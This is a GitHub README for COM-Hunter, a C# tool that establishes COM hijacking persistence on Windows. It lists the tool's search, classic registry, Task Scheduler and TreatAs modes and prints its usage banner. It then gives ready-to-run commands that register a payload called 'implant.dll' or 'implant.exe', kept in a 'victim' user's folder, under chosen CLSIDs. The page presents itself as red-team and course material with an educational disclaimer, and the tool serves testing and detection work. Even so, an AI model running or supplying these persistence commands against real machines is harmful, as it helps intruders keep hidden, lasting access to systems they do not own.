- Notifications
You must be signed in to change notification settings - Fork48
nickvourd/COM-Hunter
Folders and files
| Name | Name | Last commit message | Last commit date | |
|---|---|---|---|---|
Repository files navigation
COM Hijacking VOODOO
COM-Hunter is a COM Hijacking persistnce tool written in C#.
The following list explains the available modes:
- Search Mode: Searches for CLSIDs based on
LocalServer32,InprocServer32, and registry hivesHKLMandHKCU. - Classic Persist Mode: Performs classic COM hijacking persistence using
LocalServer32orInprocServer32. - Task Scheduler Mode: Automatically establishes COM hijacking persistence via Task Scheduler using
LocalServer32orInprocServer32. - TreatAs Mode: Performs COM hijacking persistence via the TreatAs registry key and a fake (forwardable) CLSID using
LocalServer32orInprocServer32.
If you find any bugs, don’t hesitate toreport them. Your feedback is valuable in improving the quality of this project!
The authors and contributors of this project are not liable for any illegal use of the tool. It is intended for educational purposes only. Users are responsible for ensuring lawful usage.
This project created with ❤️ by@nickvourd &&@S1ckB0y1337.
Special thanks to my friendMarios Gyftos for his invaluable assistance during the beta testing phase of this tool.
Inspired by theRTO course from@zeropointsecltd.
██████╗ ██████╗ ███╗ ███╗ ██╗ ██╗██╗ ██╗███╗ ██╗████████╗███████╗██████╗██╔════╝██╔═══██╗████╗ ████║ ██║ ██║██║ ██║████╗ ██║╚══██╔══╝██╔════╝██╔══██╗██║ ██║ ██║██╔████╔██║█████╗███████║██║ ██║██╔██╗ ██║ ██║ █████╗ ██████╔╝██║ ██║ ██║██║╚██╔╝██║╚════╝██╔══██║██║ ██║██║╚██╗██║ ██║ ██╔══╝ ██╔══██╗╚██████╗╚██████╔╝██║ ╚═╝ ██║ ██║ ██║╚██████╔╝██║ ╚████║ ██║ ███████╗██║ ██║ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝ ╚═╝ ╚══════╝╚═╝ ╚═╝ Version: 2.0 @nickvourd && @S1ckB0y1337 ~ Inspired during the RTO course by @zeropointsecltd ~Usage: COM-Hunter.exe <mode> <options>[+] Available Modes: search Search Mode persist Classic Persist Mode tasksch Task Scheduler Mode treatas TreatAs Mode[+] Search Mode:Usage: COM-Hunter.exe search <CLSID> <options> -a, --all Search DLL and EXE implementations in HKLM and HKCU -i, --inprocserver32 Search DLL implementations in HKLM and HKCU -l, --localserver32 Search EXE implementations in HKLM and HKCU -m, --machine Search DLL and EXE implementations in HKLM -u, --user Search DLL and EXE implementations in HKCU[+] Classic Persist Mode:Usage: COM-Hunter.exe persist <CLSID> <binary_path> <option> -i, --inprocserver32 Set DLL implementation -l, --localserver32 Set EXE implementation[+] Task Scheduler Mode:Usage: COM-Hunter.exe tasksch <binary_path> <option> -i, --inprocserver32 Set DLL implementation -l, --localserver32 Set EXE implementation[+] TreatAs Mode:Usage: COM-Hunter.exe treatas <CLSID> <fake_CLSID> <binary_path> <option> -i, --inprocserver32 Set DLL implementation -l, --localserver32 Set EXE implementationℹ️ Search DLL and EXE implementations in HKLM and HKCU:
.\COM-Hunter.exe search 01575CFE-9A55-4003-A5E1-F38D1EBDCBE1 -aℹ️ Search EXE implementations in HKLM and HKCU:
.\COM-Hunter.exe search "{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" -lℹ️ Advanced search EXE implementations in HKLM:
.\COM-Hunter.exe search "{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" -l --machineℹ️ Search EXE and DLL implementations in HKCU:
.\COM-Hunter.exe search AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 --userℹ️ Perform classic persistence using DLL implementation:
.\COM-Hunter.exe persist AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 C:\Users\victim\Desktop\implant.dll -iℹ️ Perform classic persistence using EXE implementation:
.\COM-Hunter.exe persist "{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" C:\Users\victim\Desktop\implant.exe --localserver32ℹ️ Perform persistence via Task Scheduler using DLL implementation:
.\COM-Hunter.exe tasksch C:\Users\victim\Desktop\implant.dll --inprocserver32ℹ️ Perform persistence via the TreatAs registry key and a fake (forwardable) CLSID using DLL implementation:
.\COM-Hunter.exe treatas AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 "{00000012-1312-1997-2605-F38D1EBDCBE1}" C:\Users\victim\Desktop\implant.dll -i